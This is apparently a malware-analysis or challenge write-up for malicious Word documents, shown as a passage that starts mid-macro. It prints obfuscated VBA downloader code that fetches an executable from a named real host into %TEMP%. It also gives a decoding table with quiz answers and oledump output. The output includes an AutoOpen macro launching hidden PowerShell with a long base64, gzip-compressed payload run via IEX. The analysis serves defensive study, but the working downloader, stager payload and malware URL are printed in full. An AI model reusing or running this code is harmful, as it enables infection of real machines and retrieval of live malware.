GoTo atdgxcypqufobazqwfbzsdpphuexwbgmzrvveuqfuissqnqrjbvmoathximeitkzlsazxqlwrbwkegkczc:
atdgxcypqufobazqwfbzsdpphuexwbgmzrvveuqfuissqnqrjbvmoathximeitkzlsazxqlwrbwkegkczc:
VPBCRFOQENN.Open XORI(Hextostring("00353B"), Hextostring("47706F634E")), FYAMZFQXNVI, False
GoTo epeseeevnrzyaadmzsevtcsqluqvolrmjnixrzskpndwmoroasnxrummjcspjhcnelodnfpcezpisjevfv:
epeseeevnrzyaadmzsevtcsqluqvolrmjnixrzskpndwmoroasnxrummjcspjhcnelodnfpcezpisjevfv:
GoTo maokmvxjtqtpftqzvdrnngwsapudlcejlbqkuatexahbsfmqoicfoaivfabrltukeprqqvrfpvrejlgeqv:
maokmvxjtqtpftqzvdrnngwsapudlcejlbqkuatexahbsfmqoicfoaivfabrltukeprqqvrfpvrejlgeqv:
GoTo sjxdhcerkhefckeipoiiuyqtxyvinbyqezfovvlmrerfrqsyaywnotmvfernkainkhxraujtcwwztuqtrk:
sjxdhcerkhefckeipoiiuyqtxyvinbyqezfovvlmrerfrqsyaywnotmvfernkainkhxraujtcwwztuqtrk:
VPBCRFOQENN.Send XORI(Hextostring("2B0F25162232"), Hextostring("4C596D54"))
GoTo gvmsrorblqfnrjolulwwxmxgvzmrtfbbfaljljudjhbbxnovjreufhyrdxpzrsvoxlooybzlkvwnadubpr:
gvmsrorblqfnrjolulwwxmxgvzmrtfbbfaljljudjhbbxnovjreufhyrdxpzrsvoxlooybzlkvwnadubpr:
GoTo vkgymmqtvhsqigckerbehvgndmtviptwxefqeovgkmdywdtsxwgeztwteajsmnvgovickubtbjojchvavr:
vkgymmqtvhsqigckerbehvgndmtviptwxefqeovgkmdywdtsxwgeztwteajsmnvgovickubtbjojchvavr:
GoTo eefacwluvdsabkxksygzskpgnyxphqvqmjvybamguztrddgzxprzrdeiyiuhbpgfwrexfqimxjosfotycl:
eefacwluvdsabkxksygzskpgnyxphqvqmjvybamguztrddgzxprzrdeiyiuhbpgfwrexfqimxjosfotycl:
MDLLXOKIXRV = VPBCRFOQENN.responseBody
GoTo oyvsqgqcyuwgtctubxrljpltcezjxtssqvblihttgpkbfekrxowacmwewceoaqxhdlotlqoquuaksqlcth:
oyvsqgqcyuwgtctubxrljpltcezjxtssqvblihttgpkbfekrxowacmwewceoaqxhdlotlqoquuaksqlcth:
GoTo dzhmmxhnfrasicvjjpseprigmeolanldvlihpwgoksljzgwoycrcitvhcaybislwhylvedsxyelioervvj:
dzhmmxhnfrasicvjjpseprigmeolanldvlihpwgoksljzgwoycrcitvhcaybislwhylvedsxyelioervvj:
GoTo isegyhulplxjpkfaqzstfxaboybyprklnkwzxoixqdexvibqjqqfvntdpjwopldzhmffbvvdvydebthefj:
isegyhulplxjpkfaqzstfxaboybyprklnkwzxoixqdexvibqjqqfvntdpjwopldzhmffbvvdvydebthefj:
QSBXXUZTKRD = FreeFile
Open CVUDEDVJFST For Binary As #QSBXXUZTKRD
Put #QSBXXUZTKRD, , MDLLXOKIXRV
Close #QSBXXUZTKRD
GoTo vdpicaomrghrizweyaaozmrwyiyrubxpytxwqedttfneypyxmwzolrkvrghzhcpvdovereglnjrdohqryu:
vdpicaomrghrizweyaaozmrwyiyrubxpytxwqedttfneypyxmwzolrkvrghzhcpvdovereglnjrdohqryu:
GoTo ngtplnbnislqtghybuwictiwrbvoddltxhtemlrbrltdyrcmoszexgadznluscjfpehkuhcvoouwavrtwv:
ngtplnbnislqtghybuwictiwrbvoddltxhtemlrbrltdyrcmoszexgadznluscjfpehkuhcvoouwavrtwv:
GoTo gwjszpofcnutwsbxmljtbuzrblemslyuiwjsilpkqhgvdmwohdyzopbtepgmqesyglpmmnbkpqghntgsfd:
gwjszpofcnutwsbxmljtbuzrblemslyuiwjsilpkqhgvdmwohdyzopbtepgmqesyglpmmnbkpqghntgsfd:
GoTo byxsxnpghvnbvkrgcuhsgztkersubfntrrmtrcjdbemqbhuvetdyllrakpcaukdktlpyupnzytvynwldzz:
byxsxnpghvnbvkrgcuhsgztkersubfntrrmtrcjdbemqbhuvetdyllrakpcaukdktlpyupnzytvynwldzz:
GoTo cckqxskeypruwnmoemiyeejgtzmqhaaonszuqrucwwvahggyylevwcjiupfyjzqhzrvsrrqfpbsqtkaohq:
cckqxskeypruwnmoemiyeejgtzmqhaaonszuqrucwwvahggyylevwcjiupfyjzqhzrvsrrqfpbsqtkaohq:
GoTo rwxumqulzygtqkrwzfbqwfewutedetjeriydgckahepjhxcpztzzrnpepyfrngvfbxztxgufoefihmlxut:
rwxumqulzygtqkrwzfbqwfewutedetjeriydgckahepjhxcpztzzrnpepyfrngvfbxztxgufoefihmlxut:
Set hBBkbmop6VHJL = CreateObject(XORI(Hextostring("020A271C3D4C0300210E2B1330162B1F3F"), Hextostring("51624270")))
GoTo zlbrmdtmprviueydvnhzltntlvfofmkntrjatbzfuxavnqxeasqawcqlnddunpozvflosmyvmvfrlwvkcw:
zlbrmdtmprviueydvnhzltntlvfofmkntrjatbzfuxavnqxeasqawcqlnddunpozvflosmyvmvfrlwvkcw:
GoTo cymkgaghrqzskhomptqembbmdowhzswsilmqxztokhksqucilnmcqlplntosnjpwpiizppkjdeaxupsqbc:
cymkgaghrqzskhomptqembbmdowhzswsilmqxztokhksqucilnmcqlplntosnjpwpiizppkjdeaxupsqbc:
GoTo sbawlclojhxparpakhmfucvtwinbxhjqqozqdofgmqiejtkkykqfzphrenmsqwmjekdxoeetrjwuemxnbh:
sbawlclojhxparpakhmfucvtwinbxhjqqozqdofgmqiejtkkykqfzphrenmsqwmjekdxoeetrjwuemxnbh:
hBBkbmop6VHJL.Open Environ(XORI(Hextostring("3C3F3A03"), Hextostring("687A7753"))) & XORI(Hextostring("1217092B0F0718371F1F133560362807"), Hextostring("4E535062"))
GoTo zhbgddcmjsnilsugiepwecwcxltbxbjufbtgufsdjvftrhkrentmbfezatdpzztqsssichtcptvblraaxs:
zhbgddcmjsnilsugiepwecwcxltbxbjufbtgufsdjvftrhkrentmbfezatdpzztqsssichtcptvblraaxs:
GoTo iipgxjxthbjxifqrzxbojqmgpfqahonaeikufzxmtdozgioggaekervfdgvbuzkoumgelbasjdvpcmzutc:
iipgxjxthbjxifqrzxbojqmgpfqahonaeikufzxmtdozgioggaekervfdgvbuzkoumgelbasjdvpcmzutc:
GoTo zygtufihxcugogvxuetvxslpzbpcunbycgmjdickpmuxxndqhwvswlbiulydkhltbnyncpizuqgsjmcidn:
zygtufihxcugogvxuetvxslpzbpcunbycgmjdickpmuxxndqhwvswlbiulydkhltbnyncpizuqgsjmcidn:
End Function
Sub IOWZJGNTSGK()
gGHBkj = XORI(Hextostring("1C3B2404757F5B2826593D3F00277E102A7F1E3C7F16263E5A2A2811"), Hextostring("744F50"))
GoTo vswgmmnoquqmdzdukyxjdchijuhbcdgxsbrnikwqdcfhiwhzbjaoqluoidzajkwvumggfhftcrnozygzlx:
vswgmmnoquqmdzdukyxjdchijuhbcdgxsbrnikwqdcfhiwhzbjaoqluoidzajkwvumggfhftcrnozygzlx:
GoTo eqowyelsbrffhhlqqucltfylnpeftufafvjrzyvtgvjpzvpeyxbayzjytlyclyghuqmwumbcduprmiblyx:
eqowyelsbrffhhlqqucltfylnpeftufafvjrzyvtgvjpzvpeyxbayzjytlyclyghuqmwumbcduprmiblyx:
GoTo ruzhzqmkplaybaejhgnsgttcpypofokfkpmcawosbktnfsxibprcykuytpgkldhvrbktjpihhfuxhbdqoh:
ruzhzqmkplaybaejhgnsgttcpypofokfkpmcawosbktnfsxibprcykuytpgkldhvrbktjpihhfuxhbdqoh:
ZUWSBYDOTWV gGHBkj, Environ(XORI(Hextostring("3E200501"), Hextostring("6A654851714A64"))) & XORI(Hextostring("11371B0A00123918220E001668143516"), Hextostring("4D734243414671"))
End Sub
Public Function XORI(ByVal pThgwA As String, ByVal uTjbLtvPsxK As String) As String
Dim qDrdEbaBjAmrQrC As Long
If 197974 = 197974 + 1 Then End
If 5669 < 12 Then
Dim rrsqtvVn As Integer
rrsqtvVn = 1
Do While rrsqtvVn < 83
DoEvents: rrsqtvVn = rrsqtvVn + 1
Loop
MsgBox ("vBNHchZL92")
End If
If Len("GoACvBKz6529") = Len("jDtqUckI") Then
Dim ZsaeMBSl As Integer
ZsaeMBSl = 6
Do While ZsaeMBSl < 96
DoEvents: ZsaeMBSl = ZsaeMBSl + 1
Loop
MsgBox ("Error !!!")
End If
Dim llWAooaJ As Integer
llWAooaJ = 4
Do While llWAooaJ < 77
DoEvents: llWAooaJ = llWAooaJ + 1
Loop
For qDrdEbaBjAmrQrC = 1 To Len(pThgwA)
If 953497 = 953497 + 1 Then End
If 6383 < 67 Then
Dim tMzCjwqZ As Integer
tMzCjwqZ = 2
Do While tMzCjwqZ < 53
DoEvents: tMzCjwqZ = tMzCjwqZ + 1
Loop
MsgBox ("IlZTqywD49")
End If
If Len("CLQsIKEv7233") = Len("JspJACJS") Then
Dim HUocoJtv As Integer
HUocoJtv = 8
Do While HUocoJtv < 68
DoEvents: HUocoJtv = HUocoJtv + 1
Loop
MsgBox ("Error !!!")
End If
Dim qqtGMmtg As Integer
qqtGMmtg = 3
Do While qqtGMmtg < 94
DoEvents: qqtGMmtg = qqtGMmtg + 1
Loop
XORI = XORI & Chr(Asc(Mid(uTjbLtvPsxK, IIf(qDrdEbaBjAmrQrC Mod Len(uTjbLtvPsxK) <> 0, qDrdEbaBjAmrQrC Mod Len(uTjbLtvPsxK), Len(uTjbLtvPsxK)), 1)) Xor Asc(Mid(pThgwA, qDrdEbaBjAmrQrC, 1)))
Next qDrdEbaBjAmrQrC
End Function
----------------------------------------------------------------------------
./oledump.py attacker4.doc -v -s 7 | grep "Set"
Set VPBCRFOQENN = CreateObject(XORI(Hextostring("3F34193F254049193F253A331522"), Hextostring("7267417269")))
Set hBBkbmop6VHJL = CreateObject(XORI(Hextostring("020A271C3D4C0300210E2B1330162B1F3F"), Hextostring("51624270")))
De-obfuscating the VBA Macro
After identifying that Stream 8 contained a VBA macro, I extracted the source code using oledump.py -s 8 -v. The code utilized a custom XOR function named XORI to hide its primary objects.
3.1 Analyzing the XOR Logic
The following line was found in the initial macro dump:
VBA
Set VPBCRFOQENN = CreateObject(XORI(Hextostring("3F34193F254049193F253A331522"), Hextostring("7267417269")))
This indicates that the attacker is creating an object by XORing a hex-encoded ciphertext with a hex-encoded key.
3.2 Decryption with CyberChef
To reveal the hidden object, I used CyberChef with the following recipe:
Input: 3F34193F254049193F253A331522
From Hex: Converts the input into raw bytes.
XOR: * Key: 7267417269
Key Format: Hex
Result: WinHttp.WinHttpRequest.5.1
Step-by-Step Decoding Table
Following the code you provided from top to bottom, here is how those specific answers appear:
| Order | Decoded Result | Purpose in the Attack | Question Answer |
|---|---|---|---|
| 1 | MSXML2.XMLHTTP | Tool to talk to the internet | |
| 2 | GET | Instruction to download | |
| 3 | Accept | Web request header | |
| 4 | ADODB.Stream | Tool to write a file to disk | |
| 5 | TEMP | The folder location | Q3: TEMP |
| 6 | \DYIATHUQLCW.exe | The name of the first file | Q2: DYIATHUQLCW.exe |
| 7 | bin.exe | The name of the second file | Q4: bin.exe |
| 8 | gv-roth.de/js/bin.exe | The download source | Q5: gv-roth.de/js/bin.exe |
Q2 & Q4: The Binaries (.exe files)
In malware analysis, a "binary" usually refers to an executable file (ending in .exe). When you decoded the strings, DYIATHUQLCW.exe appeared first in the code logic, and bin.exe appeared later. Attackers often download one "loader" which then downloads a second, more malicious payload.
Q3: The Folder (TEMP)
Malware almost always drops files into the %TEMP% directory because every Windows user has permission to write files there, and it doesn't require "Administrator" rights. In your code, the Environ("TEMP") function was used right before the filename.
Q5: The URI (gv-roth.de/js/bin.exe)
A URI (Uniform Resource Identifier) is the address of the file on the internet. In the decoded output, one of the strings was a web address. Per the instructions, we remove the http:// prefix to get the clean URI.
attacker - 05
└─$ ./oledump.py attacker5.doc
1: 114 '\x01CompObj'
2: 4096 '\x05DocumentSummaryInformation'
3: 4096 '\x05SummaryInformation'
4: 7157 '1Table'
5: 97 'Macros/CatchMeIfYouCan/\x01CompObj'
6: 313 'Macros/CatchMeIfYouCan/\x03VBFrame'
7: 7566 'Macros/CatchMeIfYouCan/f'
8: 84 'Macros/CatchMeIfYouCan/o'
9: 557 'Macros/PROJECT'
10: 113 'Macros/PROJECTwm'
11: M 1473 'Macros/VBA/CatchMeIfYouCan'
12: M 994 'Macros/VBA/Module1'
13: m 924 'Macros/VBA/ThisDocument'
14: 3394 'Macros/VBA/_VBA_PROJECT'
15: 889 'Macros/VBA/dir'
16: 4096 'WordDocument'
└─$ ./oledump.py attacker5.doc -s a -S
Microsoft Word 97-2003 Document
MSWordDoc
Word.Document.8
Title
sales
Normal
salesdepartmentx@outlook.com
Microsoft Office Word
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
sQ}#
theme/theme/theme1.xml
"GJK
TcKBc
v[`E
'.Lq
yDQ"Q
Z6/H
ud9c
J{rJ
Q/B)L
lC=h
W!alf
AXl:X
PxzSq]y<u
n6 m
;B=s!
q5;3
BU`M
b!e9#i
`571
W 0xn?G
theme/theme/_rels/themeManager.xml.rels
6?$Q
K(M&$R(.1
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
Normal
Default Paragraph Font
Table Normal
No List
Project.Module1.AutoOpen
PROJECT.MODULE1.AUTOOPEN
Unknown
Times New Roman
Symbol
Arial
Calibri
Calibri Light
Cambria Math
sales
salesdepartmentx@outlook.com
Microsoft Forms 2.0 Form
Embedded Object
VERSION 5.00
Begin {C62A69F0-16DC-11CE-9E98-00AA00574A4F} CatchMeIfYouCan
Caption = "CobaltStrikeIsEverywhere"
ClientHeight = 3015
ClientLeft = 120
ClientTop = 465
ClientWidth = 4560
StartUpPosition = 1 'CenterOwner
TypeInfoVer = 2
SquidGame
JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAGwAcwBhAGcAcQBJAGwANwBhADYAcwBPAEsAQwBnAHEAKwBJAEoAdgBNAFMAZQBWAEcAbQBCAFEAbABIAGMARwBrAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAzAGUAeQA5AFcAMwBXAHYAVgBaAFQARABUAEgAZABQADkAOQBQAFAAOQBEAFEASwBKAG4AYwBLAEMAVQB5AE4AUwBLADYATwBxAGIAcwBWAEQAawBMAFQAZABhAGgARwBvAFgARABiAGMAMABWAEMAZgBhAFgAKwBLAEIAYQBNAHkATgBGAEkATgBwADAATgBYAG4AZQBZAHYASABxAEIAcQA3ADAAaQBYAFEAOQB3AEcARgBKAC8ARgBXADYAbQBLAEUAQQAyAFYAYgBxAE4AVQBmAEIAcQB1ADMAcABrADQAUwBxAFYAdgAyAFMAQwBXAEkAOABDAFgATAA2ADUASwBkAHoAawBVADUARQBUAEkAZwBPAC8ATwBvAGkAWQBNAFgANgAxAE0AZABtADcAZQBnAGcAYgBsAFoANQBaAHoAKwB1ADUATgBqAEsAZABsAHkAOQBmAHUAbABFAFEAWQBJAGUAYwAzADIAdAA5AFQATgBnAHcAeABMAFoAcQBtAFQAZwBzAGwAYQBsAHYAMQBIAHEAUABBADMAdwAzAFUAUQA5AFkASQA5AFIAZgAxAE8AMQByAHIAVwArADUASwByAEkAdQBZAG0AawBYAGEAWABzAEkAaQBIAFgAMABiAEcAMwBzAGEAaQBpAEwAbwBLAFoANABsAGsAbABLAHgAVAAvAC8ATABKAGEAZgA3ACsAbwB2AE4AZAA2AFAAawBCAFcAVwBpAGsAbwBhAEUAbQB6AFgAZABNAHMAcQBsAHEAbgB2ADUAVwB6AEQAUgBlAHIAaABVAGwARQB5AHQAYwBBAE4AWABZAFAAVQAxAHEAYgBEAE4ARwByAEwAMwBIAHMANQBkADEANAA2ACsAMQA0AHMAWAB5AEwAYgBlAFEAagBpACsASABXAFEAbQBkAFcAegBUAHEAawBJAHcAeQBsAGcAdwA1ADQAeABMAEYAYQBwADUAMgB5AC8ANQA1AGMAWAA2AG8AOQAzAGIAKwBhAFIAUQAwAHcAYgAxADAAUwBIADQATQBEADEARgBCAHoARQBwAG8AYgBEADIAZwBBADUAdQBvAFgAbgAyAEEAQwAxAFkAZwBqAHAAYwAzAGIARgBNAGoAZwBSAFkAQgBJAEYARABuAFgAMQBCAGYAUgBpADkANABoAEwAdAAwADUAawBXAFYAVwB3ACsALwB5ADcAZABsADkASwBNAGsANgB1ADQAUAA2AHUAVQB1AG0AagBFAGsAaABOAFMAVgBDAHUAWABqAGoAeABPADMAQgBJAE8AVwAvAE8ANQBpAEMAYwBuADcAegAvAFEASwA0AHkALwBIADQAaQBXAEwAbgB3AHYAZgBBAEoAVgBYAFYAcwA0AFIAMABpACsASgBVAEEAdgBoACsANABXAHIAaQA1AGUAYwA2AEgARwBPAEkAcABUAGQAMwBRAHoAUABXACsAVQBuAFMAVgBrAHMAQQBKAFIATgB3AGcAegBkAEsANQBDAEMASgBjAGYAdgBrAG4AUAArAGQAdAByADUAcABoADkAWgBlAEcANgBsAGUAdABpADgANAA1AFAAVwBjAC8AdgBsAEwAUABLADkAZgBVAFgAdwBvADMANQBjAEsARgBQAGQAbgA4AHEAeABxAFoAbABvADYARABiAFAAMwBYAHAANgBHAEgARABkAFAAQgB2AGQAUgBCAHQAcQBsAGQAQwBWAC8ANgBMAEcAZgBZAHMASABDAE8AUgArADAAcQBKAG8ATwBmAHAAZQBKAGwAQQBlAHUAOQBDAHoAcgBGAEQATgBEAG4AbgA5AFYANAAyAHkAVAB2AHUAdAB6AFoATwBWAGEARAB2AEkAZgBnAEYAVgBDAGkALwBLAE0AegA1AHgAeQBXAGkAcQBJAGoAWQBSAHYAdwBPADcAOABEAFQAVwA4AE4ATwBHAGIANABLAG4AMAA1AFcAdQBsADEAOQArAHcAOQA0ADMATABYAFEAbQBGAFkAcABhAFkAUgBuAEgATwB0AFMAaQBrAFkAVwBWAGkAdgBVAHEAdwBUAG0AcABjAGwATgBpAEoAdQBQAGkAegArADQANgA0AFUAVwBjAFQAVQBVAEUAaQB1ADUAbAA3AEsAbgAwAEIANgAyAGIAcgByAE8AbgBCAGkASQBnADIAeQBDAHoAQQBzAEYAQQA5AHIASgByAEkAeQBWAEsAcgBVAHcATgBRAHgAbAB5AHIAbQA3AHUAcABDADgAVgBOAE0AdQBzAGkAeQA0AE0AaQBCAHAAUgBoAHkAQQBqAE0AWgBGAGcAcgBKAE8AQgBQAG8AMQBYAC8AbgBSADcAbQBtAFkAQwBMAGEAbgBvAFYAdABrAE0ANgByAGsARwBDAGgASABkAFMAYwB5ADQAbgBLADYAWQBaADIAVwBDAC8AKwBCADcAZQB2ADUAKwBSADgASwBEAEsAcwByAGkAQgA5AGMAQgBvAEkAbwBGAGcAdQBxAFYASQByAE0AeQBCAFEAMQA0AHIAVgBuADQAagAzAHYANwBuADMAWQA0AG4ANQB3AGMAMQB1AGcAQwArAEoATABPAFUASAA4AFoAbABMAFMAWABaAGMAYwBrAGsAdAB1ADEAeQArAHYAbQBPAFoASQB4AGMAUQBRAEUAMABJAFgASgB0AEQASQBXADQAMwBsAGIAeQBNAGwAWQByAE0AWQArAFMATABxAFgAUwBZAHQAWQBNACsASAB3AHMARABmADgAQQB2ADQASQBuAGgAWQBYAHkAQgBIADQAKwBIAGMANAArAGIAagB6AFUAKwBtAGsAdwBIADkATgBBAFEAWgA0ACsAOQBaAHAAUgBFAFkAcgBUAGcAYQBFAGEAZwBRAGUANwBOADcALwBPAEcARwBFAC8AYwBwADMAcABrAE4AKwB1ADYASgA4AFkAeQB6AEkAVQBQAC8AaQBEAHMAaQBYAEcAUABIAFQAUgA4AFYAMgBqAHYAegBNADcARgB6AGwAbAAvAHAAaQBaADEAZABTAE0ASwBEADIAcABmAGEAQQA1AFcAbwBaAEQASgBEADgAUwBZAEUALwB4AHUAeAA0AFgAeAB2AFIAaAAzADMAUwBIAG8AUABiAFkAOQBoADAAdgAwAEoAdQBhAEgAYgBiAHcAWgBhAHcAbABEAEgAagBIAGEAbgBkAEwAUgBxAHEATABRADkAZgA0AHEAbABjAGMAcgAzAHAATQBWAFIAeAArAHIAOQBaAGsAdwBsAE4AOABhAFAARABuAFIAKwBtAEIATwA2ADMAeQA0ADEAVgBjACsAegAwAHoAVgBrAFEAZAB4AGkAcwB4AE8AYQBUAHYARABWAEYARwA0AFYARAB0AEcAYgA5AE8AdQBkAE4AQQBHADgAbABnAGYAKwBZADgAdAAvAGEAMgBSAEMAbgBJAFQAYwBEAGcAcABxAGIAUwBmAHQAZgBXAFQAdABoAEUAUwBiAFMATwBQADAAOABHAFQAMwBBAGUANwBmAHIAVABlAE4AUQBlAFMAdwBvAEIAdABSAFQAOABsACsAagBLAGMARABCAGYAawBpAFoAawBpAHUANQBtAG0AVAByAE0AcgBIAHMAVABUAFcAUABQAEkAYQBqAE4AcwBCAHkAagB0AGUAbQBNAFQAcQA1AHgAQgBNAHQAMwBoAGUATABzAGIAZABuAGgAeQA5AGsAOQBSADUAcQBrAE8AdABxADMAQgBvAGoAYwBDADIAMAA1AFgAawBpAEEAWABxAEMAWABnAEoAYwBpAE0AUQBoAE4AcwBQAFEAYQArAGEARQBxAEgAdABIADMAUQBHAEQAbQBSAE4ATgA2AEsATgBHAFYAYQBDAFcAYwBwAE0AOQB1ADIATgBiAFIATgBlADEATwBXAFYAVQBlAGoAdwBUAEYAeABIAHcAUABQADkAOQB2AEgANwB0AE0AbQBsAFQAdgBpAGwASwA3AGcAVgBiAGgAdAB6AHAATgBPAEoAMwA2AG8AdAA3AG0ATgA5ADkAaABOAFYAOABhAHEAVwBUACsARQBnAHUAYgBlADcANwBYADcASgB1AEgAYQA0AFoANwBUACsAdQB6AFMAUABNADQAYQBpAC8AMABZADcAUgA0ADIAOQBwAHYASQBiAEcAZAB6AGkANQA4ADgASABlAGYAOQB4AFUAcgBiAHMAbwAyAFcAdABGADUANgAwAHcAVQB0AFMAawBKAEMATAA5AGkARQBzAEEAdQArAHQAWgBoAFoAKwBtAGkAMgA3AFAAVAA3AHIAQgB4AHAAZgBjADkAbQBUADYASABNAG4AMwBZADkASABmAEkAeABwADAALwBMAEoAUwBzAFQAUABaAEgAVwB2AGIAbgA0AHgARABMADYAWABEAG4AcQBtAGIAMwBjAFIAcAArAFYAWgBIAFcAOQBaAGQAZwBHAEYAMgBzAHoAYQBkADYAYgBTADcASwB3AGwANQBiADgAZgBEAFkAYQBtADgAZgBEAGsAOQBIAG4ARgBpAHUARgBuAC8ASAAzADkAbgAxAEwATgAxAHIAMwBoAHQAYwA5AEMASABIAHoAbgByAFYAWgBKADAAWgAxAHMANQBKADAAVgBOAHUAKwBmADIAagB2AHUAQwBXAHoAVwB3AFoAcgBtAGYAZQBUAEoAUgBUAEgAZABHAEcAZABqAEEAZQByADAAeAByAEYASgBwAHIAdQAyAC8AUABPAFEAZQBWAFgAWAB0AHcAUQBKAEgAbwBtAGUAWQByADkARwBEAC8ATQBrAFMASAB2AE8ARwA0AHQAVABmAGMASABvADgARgAxAFQAMgA5AG0AMwAyADUAQgBlAGIAbABuAHAAUQBSAFgAVQB0ACsAUgB1AGcATQBoAFUAdgB2AHQAbABoAEoASQBSAG8AZgBWAGUAZwA4AFQAZABEAEEAYgBpAHEAMAB2ADcAZgBVAG0AawBPAGwAVwB4AGQAZwBOAGoAcgBQAEoAawBDAEYAdgBLAGEATAA1AEoAYgA5ADEAagBVAHAAbwA4AFAANQBoADMARwBwAHQAagBIAHUATQBoAHMASgBoAHcAOQBVADMAawA5AFcARQA3AGYAZwB6AHQAeAAzAHYAcABXAEIAeQBhAEEANgBPAFgATABTAFAASgBrAG4ARgAwAFcASQBqAFgAcwA5AHAAUQAwAEwAcQAwADIAQwA2AE4AdwBiAE4AKwBrAFIAdwBMAFYATwBLAGgARwBhAEYANAA3AFoAYQBYAFcARwBTAFIARwA3AEsAdQAyADEAWABIAHQATQB0AHgATwBuAEEAVQAyAFUAdABqADgAVQAzADQARABNAGQASABzAFMARwBkAE4AQgA1ADgAcgBCAG4AZQBuADMAZwBZAFcASQBEAFgANABCAEgAWgBzAFUAWgBKAG4ANABJAFAARQAyAGwAbgBwAGoASwBHAFYAZABQAEIAQQBWAGMAegB0AFcANgBZAGYAbgBkAG0AZABrAGMAcQBRAGYAZwB5AEUATgBUAGkAawBZAFEAaABNAGIAdgBaAHkAdgBJADEAWQBKAG4ANgBiAFUAdwBvADkAWAArAHgAVgBaAFcAagBRAHcAMwBnAFAANwBpAGwATgAzAFoALwA2AEwAZwAvADgANABpADEASAB1ADkAZwBTAG8ARABCAFMAeQBiAHIAMQBUAEsAMgBiADMALwB2AHYASgA4AGUAMwBxADUAOQBtAG4AdgA3ADMAZgBxAEMAYQB3AHgAcgBhAHgAMgA1AFMAcwB4ACsAbABDAHgAZgB0AFgAOABTAEMAZwBJADkAOABpAEMAUwBnAFkATgB6AFAAWAA2AEUAZAB4AEEAdQBMAFEAaABVADkAZgBNAE4ARQBxAGwAegB6AHYAbgBJAHcANABjAGIARQBGAFgAQwBYADMAbgB0AFcAaQB6AGwAdQBWAHEAVwBlAFAAMABpAHcANABHADIAcgBoAHoAYwAvAFUAQwBsADkATQBTAGgAawB6AGoAMAAxAEcAWgBlAGgAZQBFAGIAdQBrAGMAawB4AG8AWgBSAHQANQBjAFgAQwBLADgAOQBsAGgAWAB3AFMAOQBmAHQAaABCAGUAOQBRAE8ASQBZACsAegBzAHkATAA1AEsAMABTAGUARwBwAHUAbgBzAHYAMABtAFgAQwA3ADgAUABTADkAZgAxADAAdABLADcAdQBXAHIAVwBYAEgAMwB3ADUATwBOAE8AVgByADUAVAArAFkASgArAEUARABrADIALwBqADgAbQA0AEkAZABOAC8AegB1ADAARwBYAGgANQBmAC8AWQBPAFgAZQA3AFEANQAzAGkAVgBDADgAVQAvAEMAZwBYAFIAbwBEADcATQBoACsAWQBiAGYASAAxAGcAbgAzAHIATQB1AFIAYwBDAHoAYwBuAGQAdwBWAFgAaABVAHkAVwAvAGUAMAB1ADMAcQBFAHkASgAvAEkAYQA2AFIAZABSADMANgBnADcAQwBZADAATwBtAEEAZAA4AHIAdwBTADcASwBMAG0ATABxAC8AUABuADEAagBVAHEAUQBlAFYAYgA4AFIAcwAyAHgAaABxAEYAOQB2AGgAdQA2AEsAcgBBAFUAUQB6ACsAVgBtAGMANgBOAFoATQBJAHcAOQB6AGUAVQBZADgARgBrAHoAdwAwAEEAQQBBAD0APQAiACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AAoA
CheckBox1
Tahoma
ID="{A8A99B21-86A6-4F44-904F-5A4A5CE1B784}"
Document=ThisDocument/&H00000000
Module=Module1
Package={AC9F2F90-E877-11CE-9F68-00AA00574A4F}
BaseClass=CatchMeIfYouCan
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="C5C7209B60D664D664D664D664"
DPB="FCFE19D4670A680A680A"
GC="3331D6210C220C22F3"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisDocument=409, 261, 2252, 695,
Module1=137, 219, 1587, 738,
CatchMeIfYouCan=130, 130, 1973, 564, , 52, 52, 1502, 571,
ThisDocument
Module1
CatchMeIfYouCan
tThisDocument
1Module1
nCatchMeIfYouCan
ey_q
Attribut
e VB_Nam
e = "Cat
chMeIfYo
uCan"
0{1E
FEF94B-5
D68-499E
-896C-2E
F23F0DFA
0F}{91AF
CBA1-38E
A-4EEC-A
A4D-8812
BB58}
d@Global
oFals
Creata
PredeHcla
BExpos
0Templ
ateDeriv
Customi
b SquidG
_Click(
0{1EFEF94B-5D68-499E-896C-2EF23F0DFA0F}{91AFCBA1-38EA-4EEC-AA4D-8812B8EABB58}
powershell -nop -w hidden -encodedcommand
Attribut
e VB_Nam
e = "Mod
ule1"
ub AutoO
pen()
Shell "@powers
nop -w h
idden -e
ncodedco
mmand "
& CatchM
eIfYouCa
n.SquidG
.Contro
lTipText
Attribut
e VB_Nam
e = "Thi
sDocumen
1Normal
VGlobal!
Spac
Crea
tabl
Pre decla
BExp
Temp
lateDeri
$Custom
(1Normal.ThisDocument
Word
Win16
Win32
Win64x
VBA6
VBA7
Project-
stdole
Normal
Office
MSFormsC
ThisDocument<
_Evaluate
Module1b
AutoOpen
ShellV
CatchMeIfYouCanB
